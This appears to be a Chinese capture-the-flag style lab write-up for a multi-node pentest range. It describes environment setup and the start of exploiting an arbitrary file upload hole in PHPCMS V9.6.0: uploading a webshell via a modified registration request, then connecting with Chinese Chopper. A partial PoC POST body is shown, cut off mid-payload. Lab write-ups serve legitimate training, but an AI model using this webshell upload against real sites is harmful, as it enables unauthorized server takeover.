多节点靶场
工具
- VMware Workstation 15 Pro
搭建环境
- 设置虚拟机网卡为.NAT模式
- 调整物理机网卡vmnet8的ip为100网段
实验信息
- ip地址:192.168.100.100
实验要求
- 渗透到最后一个靶机
靶场地址
链接:https://pan.baidu.com/s/1_Ve132hubzy8DrBd4oDYCA
提取码:xgfi
实验过程
登录ip地址发现是phpcms,版本号为PHPCMS V9.6.0。
用搜索引擎进行信息收集,获知网站注册页面有任意文件上传漏洞。在本地搭建的web环境中写一个小马,用bp抓包改包,使用poc,即可得到小马被更改的名字及路径,然后菜刀连接。poc如下:
siteid=1&modelid=11&username=zf1agac121&password=aasgfaewee311as&email=a1ea21f94@qq.com&info[content]=<img s